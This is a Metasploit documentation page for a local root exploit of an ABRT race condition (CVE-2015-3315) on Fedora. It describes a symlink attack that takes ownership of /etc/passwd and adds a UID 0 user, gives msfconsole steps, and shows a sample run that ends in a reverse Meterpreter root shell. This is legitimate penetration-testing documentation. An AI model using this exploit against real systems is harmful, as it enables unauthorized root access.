adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
metasploit-gs/documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md
T
Brendan Coles 696817215b Update tested versions
2018-02-05 04:48:52 +00:00

2.3 KiB
Raw Blame History

Description

This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.

Vulnerable Application

A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on /var/tmp/abrt/*/maps to change the ownership of /etc/passwd, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.

This module has been tested successfully on ABRT packaged versions:

  • 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
  • 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
  • 2.2.2-2.fc20 on Fedora Desktop 20 x86_64

Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/abrt_raceabrt_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options

USERNAME

Username for the new UID=0 user (default: random)

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios

msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.C17d3UYQy' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding pauITBusGM user to /etc/passwd ...
[*] Writing '/tmp/.u8zOz4c' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38938) at 2018-02-03 21:29:56 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink